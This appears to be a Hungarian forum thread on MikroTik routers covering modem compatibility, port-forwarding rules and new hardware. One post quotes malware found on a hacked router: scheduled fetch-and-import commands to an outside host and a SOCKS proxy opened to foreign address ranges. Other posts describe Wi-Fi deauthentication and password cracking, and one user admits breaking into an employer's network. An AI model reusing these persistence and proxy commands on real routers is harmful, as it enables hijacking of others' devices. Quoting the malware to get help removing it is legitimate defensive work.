Hirdetés
-
GAMEPOD.hu
Mikrotik routerekkel foglalkozó téma. Mikrotik router típusok, hardverek, router beállítások, programozás (scriptek írása), frissítés, és minden Mikrotik routerrel kapcsolatos beszélgetés helye.
Új hozzászólás Aktív témák
-
bacus
őstag
válasz kovyhun #5648 üzenetére
Nem válogatós, hanem van amivel kompatibilis és van amivel nem. Keress rá, van egy mikrotik hardware compatibility táblázat, (itt is biztos linkeltem én is ), ott látod, hogy mi megy és melyik ros verziótól.
Kössünk egyezséget, megegyezős egyezséget... https://www.paypal.me/engiman/30
-
kovyhun
tag
Ezt a táblázatot nézegettem már ha erről van szó: https://wiki.mikrotik.com/wiki/Supported_Hardware
De inkább tapasztalat érdekelne, mi az mi nálunk beszerezhető, nem túl drága és bevállt, nincsenek nyűgjei.
A táblázatban a most használt 3G modemem sincs benne, valószínű nem teljes a lista, illetve ugyanaz a hardver több néven is kijöhetett."Hajszolom a tudást, de ő mindig gyorsabb nálam!"
-
Adamo_sx
aktív tag
válasz kovyhun #5648 üzenetére
Nekem egy ilyen HUAWEI E3276 van. Működik vele, de még nem nyüstöltem, csak kíváncsiságból van.
-
bacus
őstag
válasz Adamo_sx #5653 üzenetére
Ez konkrétan jó tipus, át kellett konfigolni, mert nem lte modemként ismeri fel, de stabil 30/30 Mbitet tud nálam, évek óta használom kempingben egész nyáron május-szeptember. Soha nem kell újraindítani, tápot elvenni. 100 nap folyamatos online, után is áramszünet miatt indult újra.
Egy rb952-be van bedugva, érdekesség, hogy 951g-vel nem ment (2 éve legalábbis)
Ugyanilyen konfigot csináltam még pár embernek, még egyet se hoztak vissza problémával.
Kössünk egyezséget, megegyezős egyezséget... https://www.paypal.me/engiman/30
-
ekkold
Topikgazda
válasz kovyhun #5652 üzenetére
Gondolom ez azért nehéz ügy, mert a mikrotiknek nincs lehetősége minden megjelenő típus esetén ellenőrizni a kompatibilitást. Ezek az USB-s kütyük valamennyire szabványos felülettel kommunikálnak (hasonló a régi vonalas modemek AT parancskészletéhez csak lényegesen több parancsot támogat), de azok a típusok amelyek működéséhez egyedi parancsok kellenek nem biztos hogy működni fognak. Ugyanakkor a standard parancskészlettel jól működő típusok akkor is működhetnek kifogástalanul, ha egyébként nem szerepelnek a kompatibilitási listában.
http://skory.gylcomp.hu/ http://www.skory.z-net.hu/ https://skori.hu/ https://skori.spacetechnology.net/ https://www.hobbielektronika.hu/apro/index.php?u=1574
-
kovyhun
tag
válasz Core2duo6600 #5650 üzenetére
Külterület, egy szőlőhegy.
Elérhető wifis internet, de mivel még erősen felújítás alatt van a ház, nem szeretnék feleslegesen minden hónapban havidíjat fizetni. A mobilnet most csak átmeneti megoldás hogy az ott dolgozó raspberryket távolról elérjem, ezért is nem akarok sokat költeni rá."Hajszolom a tudást, de ő mindig gyorsabb nálam!"
-
Core2duo6600
veterán
Lehetséges a miki vel port tartományt forwardolni, egy belső ip re ?
pl 64000- 64050 ig, ez lehetséges ?Mi a különbség a dstnat és a netmap között ?
Gigabyte Z390 Aorus master , Core i9 9900K, Asus RTX2070, 64 GB DDR4, Dell Latitude 6430
-
ekkold
Topikgazda
válasz Core2duo6600 #5657 üzenetére
Igen lehetséges pl.
/ip firewall nat add action=dst-nat chain=dstnat dst-port=57030-57039 in-interface=pppoe-digi protocol=tcp to-addresses=192.168.5.33 to-ports=57030-57039A netmap-ot én a soho routerek DMZjéhez hasonlítanám.
http://skory.gylcomp.hu/ http://www.skory.z-net.hu/ https://skori.hu/ https://skori.spacetechnology.net/ https://www.hobbielektronika.hu/apro/index.php?u=1574
-
Ablakos
őstag
válasz Core2duo6600 #5657 üzenetére
A dstnat action a csomag célcímét változtatja az általad megadottra. A netmap action címtartományra vonatkozik. Párja a same action. Hasonlóak, de a same biztosítja, hogy a NAT-olt kliensed mindig ugyanazt a címet kapja bármennyi kapcsolatot is nyit.
-
nagyúr
Megjelent a 4011 a mikrotik hivatalos oldalán
RB4011iGS+5HacQ2HnD-IN
RB4011GS+RMOlcsónak nem mondanám őket
[ Szerkesztve ]
Új hardverek számlával, garanciával érd PM.
-
-
nagyúr
válasz E.Kaufmann #5661 üzenetére
Igen láttam, beleolvasgattam.
Pedig vártam amúgy rá, mert így akkor az RB450Gx4+hAPc kombót válthatta volna, de látva az árát marad minden
Amúgy októbertől lesz elvileg elérhető.Új hardverek számlával, garanciával érd PM.
-
ekkold
Topikgazda
Jól nézem, hogy végül ugyanazt a procit tették bele mint az RB1100AHx4-be? A RAM is ugyanannyi. A flash viszont több! Ehhez képest viszont jóval olcsóbb mint az AHx4.
http://skory.gylcomp.hu/ http://www.skory.z-net.hu/ https://skori.hu/ https://skori.spacetechnology.net/ https://www.hobbielektronika.hu/apro/index.php?u=1574
-
ekkold
Topikgazda
válasz E.Kaufmann #5661 üzenetére
Tulajdonképpen mi a gond a sw-el?
http://skory.gylcomp.hu/ http://www.skory.z-net.hu/ https://skori.hu/ https://skori.spacetechnology.net/ https://www.hobbielektronika.hu/apro/index.php?u=1574
-
ekkold
Topikgazda
válasz E.Kaufmann #5661 üzenetére
Utánaolvastam én is. Szerintem otthoni felhasználásban nem tud problémát okozni a VLAN-ok szoftveres kezelése. Valószínűleg ezzel együtt sem igazán fut otthon semmi olyan, ami képes lenne komolyabban megterhelni ezt a CPU-t.
http://skory.gylcomp.hu/ http://www.skory.z-net.hu/ https://skori.hu/ https://skori.spacetechnology.net/ https://www.hobbielektronika.hu/apro/index.php?u=1574
-
Core2duo6600
veterán
Így állítottam be :
;;; rTorrent Atom
chain=dstnat action=dst-nat to-addresses=192.168.1.6 to-ports=61001-61250 protocol=tcp in-interface=Digi-PPPOE dst-port=61001-61250 log=no log-prefix=""9 chain=dstnat action=dst-nat to-addresses=192.168.1.6 to-ports=61001-61250 protocol=udp in-interface=Digi-PPPOE dst-port=61001-61250 log=no log-prefix=""
Amikor a ping.eu val ellenőríztem, akkor a csak a 61001 es re írta, hogy open.
Hogy most azért, mert a rtorrent csak azt figyeli annak ellenére, hogy tartomány volt megadva gyárilag is benne, nem pont ez, de ugyanekkora, vagy a miki nem küldi ki, ezt nem tudom.Gigabyte Z390 Aorus master , Core i9 9900K, Asus RTX2070, 64 GB DDR4, Dell Latitude 6430
-
bambano
titán
válasz E.Kaufmann #5661 üzenetére
"A beépített sw-k képességeit már kritizálják a hivatalos Miki fórumon.": azt nehezen... merthogy nincsenek
szerintem is súlyos hiba volt ilyen gagyi switch-csel kihozni ezt a routert.
Egy átlagos héten négy hétfő és egy péntek van (C) Diabolis
-
ekkold
Topikgazda
válasz Core2duo6600 #5668 üzenetére
Attól, hogy továbbítva van egy port, még nem fog válaszolni is egy külső kérésre, csak akkor, ha a cél címen van is valamilyen szolgáltatás mögötte ami válaszolni tud.
http://skory.gylcomp.hu/ http://www.skory.z-net.hu/ https://skori.hu/ https://skori.spacetechnology.net/ https://www.hobbielektronika.hu/apro/index.php?u=1574
-
ekkold
Topikgazda
válasz Core2duo6600 #5673 üzenetére
Elvileg ott volt mögötte, gyakorlatilag meg valószínűleg csak egy portot használt.
http://skory.gylcomp.hu/ http://www.skory.z-net.hu/ https://skori.hu/ https://skori.spacetechnology.net/ https://www.hobbielektronika.hu/apro/index.php?u=1574
-
zamar
csendes tag
Sziasztok!
Az alábbi problémám lenne RB433Gl boardal és R52nM Wifi kártyával AP módban. Véletlenszerűen az összes rácsatlakozott eszközt eldobja MIC failure hibával a log-ban. Van esetleg ötletetek mi okozza? Mikorotik manual szerint: TKIP message integrity check failure, somebody must be trying to break into or DOS network, If more than 1 MIC failure is encountered during 60s period, "TKIP countermeasures" state is entered. de ezt én kizártnak tartom. Két ilyen eszköz is van és mindegyiknél előfordul. Ha az egyik router eldobja az eszközöket akkor azonnal felcsatlakoznak a másikra ami hatótávon belül van, de van csomagvesztés így a munka sem zavartalan és elég nagy problémát okoz. Próbáltam úgy hogy lekapcsoltam másik hatótávon belül lévő eszközt de a hiba így is jelentkezik csak nem másikra hanem ugyan arra csatlakoznak vissza.
Válaszotokat előre is köszönöm.
[ Szerkesztve ]
-
ekkold
Topikgazda
A RouterOs volt frissítve mostanában?
Miért TKIP ? Általában a WPA2+AES a biztonságosabb, és minden eszköz ezt preferálja.
Nem jelent meg a TKIP-hez valamilyen törés mostanában? Biztos nem próbálja hekkelni valaki?Kb 10éve, a saját hálózatomon, az akkori TP-Link routeremen kipróbáltam mennyire törhető. Ha a WPS gombos (PIN kódos) belépés engedélyezve volt, akkor sikerült feltörni és a WPA2 jelszóhoz is hozzáférni! Letiltott WPS esetén nem sikerült feltörni. Viszont a törés úgy működik, hogy olyan kamu csomagokat küld a klienseknek, amitől azt hiszik ledobta őket a wifi, ilyenkor újra csatlakoznak (esetleg másik AP-hez ha több van). A hacker program elkapja az újracsatklakozáskor küldött csomagokat. Ha egyszerű a jelszó, vagy ha a PIN kód is engedélyezett, akkor 1000....10000 csomagot begyűjtve néhány óra alatt sikerülhet a visszafejtés.
http://skory.gylcomp.hu/ http://www.skory.z-net.hu/ https://skori.hu/ https://skori.spacetechnology.net/ https://www.hobbielektronika.hu/apro/index.php?u=1574
-
Core2duo6600
veterán
Én a céges wifi t törtem fel, amin nincs wps gomb, wpa 2 hitelesítés, az egész megvolt 1 óra alatt, úgy, hogy nem értek hozzá.
csak megadott programokat használtam a megadott sorrendben.Hát ezért fontos, hogy mielöbb bevezessék a wpa 3 ast.
[ Szerkesztve ]
Gigabyte Z390 Aorus master , Core i9 9900K, Asus RTX2070, 64 GB DDR4, Dell Latitude 6430
-
ekkold
Topikgazda
válasz Core2duo6600 #5677 üzenetére
Gondolom akkor nem volt túl bonyolult a jelszó. WPA2-AES titkosítás esetén, egy kellően hosszú jelszót nem valószínű, hogy fel tudnál törni.
http://skory.gylcomp.hu/ http://www.skory.z-net.hu/ https://skori.hu/ https://skori.spacetechnology.net/ https://www.hobbielektronika.hu/apro/index.php?u=1574
-
arnoldx17
csendes tag
RouterOS v6.43 már tölthető!
apt-get rekt
-
-
-
A_ScHuLcZ
addikt
Sziasztok!
Feltételezhetően feltört eszközt hogyan tudok megtisztítani? Belépéskor a log tele volt hibaüzenetekkel, és volt egy script, aminek a forrása ismeretlen.
Log bejegyzés, ami ismétlődött:
script error: expected end of command (line 3 column 86)A scriptben ez állt:
/tool fetch address=95.154.216.163 port=2008 src-path=/mikrotik.php mode=httpA letöltött mikrotik.php fájlt töröltem, de azért letöltöttem pc-re, és belenéztem, ilyen bejegyzésekkel volt tele:
/system scheduler remove [find name !="U3" && name !="U4"]
/ip socks set enabled=yes port=44550
{ :local countRules [/ip socks access print count-only]; :for i from 0 to $countRules-1 step=1 do= {/ip socks access remove $i} }
/ip socks access add src-address=5.188.42.224/29 action=allow
/ip socks access add src-address=5.188.42.232/30 action=allow
/ip socks access add src-address=5.188.42.236/31 action=allow
/ip socks access add src-address=5.188.42.238/32 action=allow
/ip socks access add src-address=5.188.42.96/29 action=allow
/ip socks access add src-address=5.188.42.104/30 action=allow
/ip socks access add src-address=5.188.42.108/31 action=allow
/ip socks access add src-address=5.188.42.110/32 action=allow
/ip socks access add src-address=5.189.235.80/30 action=allow
/ip socks access add src-address=5.189.235.84/31 action=allow
/ip socks access add src-address=5.189.235.86/32 action=allow
/ip socks access add src-address=192.243.53.14/32 action=allow
/ip socks access add src-address=192.243.53.15/32 action=allow
/ip socks access add src-address=192.243.53.31/32 action=allow
/ip socks access add src-address=46.20.39.117/32 action=allow
/ip socks access add src-address=78.46.114.23/32 action=allow
/ip socks access add src-address=213.202.230.152/32 action=allow
/ip socks access add src-address=31.184.224.107/32 action=allow
/ip socks access add src-address=31.184.224.108/32 action=allow
/ip socks access add src-address=31.184.224.109/32 action=allow
/ip socks access add src-address=5.188.42.109/32 action=allow
/ip socks access add src-address=0.0.0.0/0 action=denyEddig elvégzett műveletek:
- idegen script és job törlése
- winbox-on kívül minden service tiltása, winbox is kizárólag egy távoli ip-ről engedélyezve
- ip socks kikapcsolása
- user pw csere
- fw és RouterOS frissítés 6.43-ra, majd rebootMár nem látok idegen scriptet, de a log-ban a fenti bejegyzés időnként továbbra is megjelenik. A mikrotik.php fájl időnként továbbra is letöltődik, továbbá 5 percenként egy 7xe7zt46hb08 nevű fájl is letöltődik, aminek a tartalma az alábbi:
:do { /system scheduler set U3 name="U5" on-event="/tool fetch url=http://ciskotik.com/poll/4e57ce74-3959-441c-be72-2ead3b6d0e57 mode=http dst-path=7xe7zt46hb08\r\n/import 7xe7zt46hb08" } on-error={ :put "U3 not found"}:do { /system scheduler set U4 name="U5" on-event="/tool fetch url=http://ciskotik.com/poll/4e57ce74-3959-441c-be72-2ead3b6d0e57 mode=http dst-path=7xe7zt46hb08\r\n/import 7xe7zt46hb08" } on-error={ :put "U4 not found"}
Mit tudok tenni? (nem látok se script-et, se job-ot, más módszerrel csinálja)
[ Szerkesztve ]
"I'd tell you a joke about UDP, but you probably wouldn't get it."
-
Core2duo6600
veterán
válasz bambano #5687 üzenetére
Minden bizonnyal erre gondoltál :
https://wiki.mikrotik.com/wiki/ManualetinstallGigabyte Z390 Aorus master , Core i9 9900K, Asus RTX2070, 64 GB DDR4, Dell Latitude 6430
-
A_ScHuLcZ
addikt
válasz bambano #5687 üzenetére
Megtaláltam a kis rohadékot, ide fészkelte be magát:
Ha a logban nem tapasztalok semmi furát, akkor bízhatok benne, hogy sikerült kiirtani?
A flash is teljesen üres:
Nem ártana tudni hogyan jutott be, hogy legközelebb ne forduljon elő, de erre gondolom keresztet vethetek logok nélkül. (a régi szoftver sérülékenységének kihasználására tippelek)
"I'd tell you a joke about UDP, but you probably wouldn't get it."
-
-
A_ScHuLcZ
addikt
Attól tartok nem fogom megúszni a netinstallt és az újrakonfigolást.
Délután még mozgattam távolról, most viszont se lokál hálóról, se arról az IP-ről nem tudok belépni, ahova szűkítve van a service elérése.
Lokál háló esetén: mindegy milyen adatokat írok be, a winbox Logging in-nél megáll, ssh-t pedig egyből visszadobja.
A megfelelő távoli címről próbálkozva winbox-ban Could not connect üzenet jön szembe, ssh pedig timeoutol.
[ Szerkesztve ]
"I'd tell you a joke about UDP, but you probably wouldn't get it."
-
bacus
őstag
válasz A_ScHuLcZ #5693 üzenetére
"winbox-on kívül minden service tiltása, winbox is kizárólag egy távoli ip-ről engedélyezve"
ezek szerint az ssh-t is tiltottad, nem csoda, hogy nem enged be.
local hálóról mac alapon se tudsz belépni?
Kössünk egyezséget, megegyezős egyezséget... https://www.paypal.me/engiman/30
-
ekkold
Topikgazda
Feltetm a 6.43-at a hAPac2-re. Működik, de azóta nem enged be távolról VPN-en. Majd este ránézek mi lett vele...
http://skory.gylcomp.hu/ http://www.skory.z-net.hu/ https://skori.hu/ https://skori.spacetechnology.net/ https://www.hobbielektronika.hu/apro/index.php?u=1574
-
ekkold
Topikgazda
Meg is van mi lett vele... Amikor frissítettem a routert, akkor újra kellett indítani, ekkor a netre is újra csatlakozott, azonban az új IP cím amit kiosztottak - az eddigiekkel szemben - egy NAT-olt, nem publikus IP. Ezért nem érem el távolról a routert... Írtam a digi ügyfélszolgálatnak egy email-t (mivel a telefont nem veszik fel), hogy ez így nem ok. Meglátjuk történik-e érdemben valami.
http://skory.gylcomp.hu/ http://www.skory.z-net.hu/ https://skori.hu/ https://skori.spacetechnology.net/ https://www.hobbielektronika.hu/apro/index.php?u=1574
-
Istv@n
aktív tag
Sziasztok!
Nem próbálta valaki véletlenül a mindenamimikrotik.hu -n található online tanfolyamokat?
A havidíjas konstrukciót nézem, de elég kevés az infó róla. Ha befizetek egy hónapra, mondjuk az online All in csomagra, akkor egy hónapon keresztül teljes hozzáférésem van az összes tananyaghoz, vagy van esetleg valamilyen korlátozás?
Új hozzászólás Aktív témák
- Ukrajnai háború
- A fociról könnyedén, egy baráti társaságban
- Azonnali alaplapos kérdések órája
- Linux Mint
- EAFC 25
- Most épp a Red Magic 10 Pro+ ült az AnTuTu trónjára
- AMD K6-III, és minden ami RETRO - Oldschool tuning
- Asztali használathoz tervezett, masszív kapacitású külső SSD a Team Grouptól
- Projektor topic
- AMD Ryzen 9 / 7 / 5 9***(X) "Zen 5" (AM5)
- További aktív témák...
- Bontatlan Lenovo ip. 3 "Kis Gamer" Laptop -35% 15,6" RYZEN 7 5700U 16/512GB FHD Radeon 2GB!!!
- Honor 200 Lite 256GB, 1 Év Garanciával, Kártyafüggetlen
- Apple iPhone 11 64GB, Kártyafüggetlen, 1 Év Garanciával
- Apple iPhone 13 Pro Max 256GB, Kártyafüggetlen, 1 Év Garanciával,
- Samsung Galaxy S24 5G 256GB, Kártyafüggetlen, 1 Év Garanciával
Állásajánlatok
Cég: PCMENTOR SZERVIZ KFT.
Város: Budapest
Cég: HC Pointer Kft.
Város: Pécs